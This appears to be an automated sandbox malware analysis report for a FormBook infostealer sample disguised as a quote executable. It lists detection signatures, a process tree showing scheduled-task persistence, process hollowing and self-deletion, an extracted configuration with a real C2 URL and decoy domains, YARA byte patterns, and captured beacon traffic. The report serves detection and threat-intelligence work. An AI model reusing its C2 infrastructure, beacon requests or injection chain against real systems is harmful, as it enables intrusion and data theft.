Loading ...

Play interactive tourEdit tour

Windows Analysis Report Quote#56432.exe

Overview

General Information

Sample Name:Quote#56432.exe
Analysis ID:483794
MD5:3812ebc395330bef949cc2c7264d1632
SHA1:4dc9fd68e73e0b14ab02670bb7c80372d0043bc4
SHA256:97ea895e92f76192010e02f12aca8ec4ffa1b667e84c9958332d280ced624402
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Quote#56432.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\Quote#56432.exe' MD5: 3812EBC395330BEF949CC2C7264D1632)
    • schtasks.exe (PID: 7100 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ySWmXEgh' /XML 'C:\Users\user\AppData\Local\Temp\tmp994F.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 5848 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • systray.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
        • cmd.exe (PID: 6492 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.constructioncleanup.pro/vd9n/"], "decoy": ["theunwrappedcollective.com", "seckj-ic.com", "tyresandover.com", "thetrophyworld.com", "fonggrconstruction.com", "hopiproject.com", "sktitle.com", "charlotteobscurer.com", "qjuhe.com", "girlzglitter.com", "createmylawn.com", "hempcbgpill.com", "zzdfdzkj.com", "shreehariessential.com", "226sm.com", "getcupscall.com", "neuralviolin.com", "sanskaar.life", "xn--fhqrm54yyukopc.com", "togetherx4fantasy5star.today", "buyonlinesaree.com", "percyshandman.site", "hatchethangout.com", "rugpat.com", "zen-gizmo.com", "vipmomali.com", "lacerasavall.cat", "aqueouso.com", "mkolgems.com", "sevenhundredseventysix.fund", "fotografhannaneret.com", "mitravy.com", "bmtrans.net", "linterpreting.com", "izquay.com", "sawaturkey.com", "marche-maman.com", "eemygf.com", "animenovel.com", "travelssimply.com", "montecitobutterfly.com", "volebahis.com", "daniela.red", "ramseyedk12.com", "leyterealestate.info", "patriotstrong.net", "vkgcrew.com", "nadhiradeebaazkiya.online", "hotelcarre.com", "myfabulouscollection.com", "stellantis-luxury-rent.com", "hn2020.xyz", "emilyscopes.com", "lotosouq.com", "lovecord.date", "stconstant.online", "volkite-culverin.net", "allwaysautism.com", "sheisnatashasimone.com", "sepantaceram.com", "ishopgrady.com", "lifestorycard.com", "sexybbwavailable.website", "domainbaycapital.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 2 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Quote#56432.exe' , ParentImage: C:\Users\user\Desktop\Quote#56432.exe, ParentProcessId: 6792, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5848
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Quote#56432.exe' , ParentImage: C:\Users\user\Desktop\Quote#56432.exe, ParentProcessId: 6792, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5848

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.constructioncleanup.pro/vd9n/"], "decoy": ["theunwrappedcollective.com", "seckj-ic.com", "tyresandover.com", "thetrophyworld.com", "fonggrconstruction.com", "hopiproject.com", "sktitle.com", "charlotteobscurer.com", "qjuhe.com", "girlzglitter.com", "createmylawn.com", "hempcbgpill.com", "zzdfdzkj.com", "shreehariessential.com", "226sm.com", "getcupscall.com", "neuralviolin.com", "sanskaar.life", "xn--fhqrm54yyukopc.com", "togetherx4fantasy5star.today", "buyonlinesaree.com", "percyshandman.site", "hatchethangout.com", "rugpat.com", "zen-gizmo.com", "vipmomali.com", "lacerasavall.cat", "aqueouso.com", "mkolgems.com", "sevenhundredseventysix.fund", "fotografhannaneret.com", "mitravy.com", "bmtrans.net", "linterpreting.com", "izquay.com", "sawaturkey.com", "marche-maman.com", "eemygf.com", "animenovel.com", "travelssimply.com", "montecitobutterfly.com", "volebahis.com", "daniela.red", "ramseyedk12.com", "leyterealestate.info", "patriotstrong.net", "vkgcrew.com", "nadhiradeebaazkiya.online", "hotelcarre.com", "myfabulouscollection.com", "stellantis-luxury-rent.com", "hn2020.xyz", "emilyscopes.com", "lotosouq.com", "lovecord.date", "stconstant.online", "volkite-culverin.net", "allwaysautism.com", "sheisnatashasimone.com", "sepantaceram.com", "ishopgrady.com", "lifestorycard.com", "sexybbwavailable.website", "domainbaycapital.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Quote#56432.exeVirustotal: Detection: 29%Perma Link
          Source: Quote#56432.exeMetadefender: Detection: 28%Perma Link
          Source: Quote#56432.exeReversingLabs: Detection: 78%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\ySWmXEgh.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\AppData\Roaming\ySWmXEgh.exeReversingLabs: Detection: 78%
          Machine Learning detection for sampleShow sources
          Source: Quote#56432.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\ySWmXEgh.exeJoe Sandbox ML: detected
          Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Quote#56432.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Quote#56432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: RegSvcs.exe, 00000007.00000002.782499789.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000007.00000002.782499789.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: RegSvcs.pdb, source: systray.exe, 0000000F.00000002.927302675.0000000004A8F000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.784083913.0000000001A3F000.00000040.00000001.sdmp, systray.exe, 0000000F.00000002.926821802.000000000467F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
          Source: Binary string: RegSvcs.pdb source: systray.exe, 0000000F.00000002.927302675.0000000004A8F000.00000004.00020000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeDomain query: www.lovecord.date
          Source: C:\Windows\explorer.exeDomain query: www.neuralviolin.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.constructioncleanup.pro/vd9n/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /vd9n/?NfB=6+C1z2NTXQU5TtDgYCNVveFhDHAhXY7UdOammGZxKywecd1Rk4eK0uo6Q7X2XlF/f8Go&o87p=d640H6WhXv9 HTTP/1.1Host: www.lovecord.dateConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 44.227.76.166 44.227.76.166
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: systray.exe, 0000000F.00000002.927431554.0000000004F7F000.00000004.00020000.sdmpString found in binary or memory: http://lovecord.date
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Quote#56432.exe, 00000000.00000003.665504791.00000000058CE000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.665428445.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: Quote#56432.exe, 00000000.00000003.664495208.00000000058CF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Quote#56432.exe, 00000000.00000003.664495208.00000000058CF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com.123
          Source: Quote#56432.exe, 00000000.00000003.664495208.00000000058CF000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comC
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Quote#56432.exe, 00000000.00000003.664613718.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-u
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Quote#56432.exe, 00000000.00000003.666494619.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/3
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Quote#56432.exe, 00000000.00000003.667501678.00000000058D0000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.667456774.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Quote#56432.exe, 00000000.00000003.666549661.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cz;a
          Source: Quote#56432.exe, 00000000.00000003.667061903.00000000058CF000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Quote#56432.exe, 00000000.00000003.667061903.00000000058CF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html3
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Quote#56432.exe, 00000000.00000003.666850356.00000000058CF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersR
          Source: Quote#56432.exe, 00000000.00000003.666549661.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersg
          Source: Quote#56432.exe, 00000000.00000003.666754869.00000000058CF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersi
          Source: Quote#56432.exe, 00000000.00000003.673228256.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersx
          Source: Quote#56432.exe, 00000000.00000002.692495401.00000000058A0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: Quote#56432.exe, 00000000.00000002.692495401.00000000058A0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: Quote#56432.exe, 00000000.00000002.692495401.00000000058A0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comiono
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Quote#56432.exe, 00000000.00000003.663958515.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Quote#56432.exe, 00000000.00000003.663958515.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnk
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Quote#56432.exe, 00000000.00000003.669659423.00000000058D0000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.664849579.00000000058A4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Quote#56432.exe, 00000000.00000003.664849579.00000000058A4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-t4
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//z
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Norm
          Source: Quote#56432.exe, 00000000.00000003.665005799.00000000058A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-d
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/adnl
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Quote#56432.exe, 00000000.00000003.665374375.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-us
          Source: Quote#56432.exe, 00000000.00000003.672566366.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Quote#56432.exe, 00000000.00000003.665504791.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Quote#56432.exe, 00000000.00000003.664716460.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Quote#56432.exe, 00000000.00000003.668210925.00000000058D0000.00000004.00000001.sdmp, Quote#56432.exe, 00000000.00000003.668015602.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Quote#56432.exe, 00000000.00000003.667982119.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de%Y
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Quote#56432.exe, 00000000.00000003.668046451.00000000058D0000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deFT
          Source: Quote#56432.exe, 00000000.00000003.666447003.00000000058CE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deoc
          Source: Quote#56432.exe, 00000000.00000002.693028363.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.lovecord.date
          Source: global trafficHTTP traffic detected: GET /vd9n/?NfB=6+C1z2NTXQU5TtDgYCNVveFhDHAhXY7UdOammGZxKywecd1Rk4eK0uo6Q7X2XlF/f8Go&o87p=d640H6WhXv9 HTTP/1.1Host: www.lovecord.dateConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.925308127.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.781503558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.738249263.000000000E47D000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925553519.0000000000B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.925610906.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782221543.0000000001490000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.690791851.0000000003B59000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.782183245.0000000001460000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.720837328.000000000E47D000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
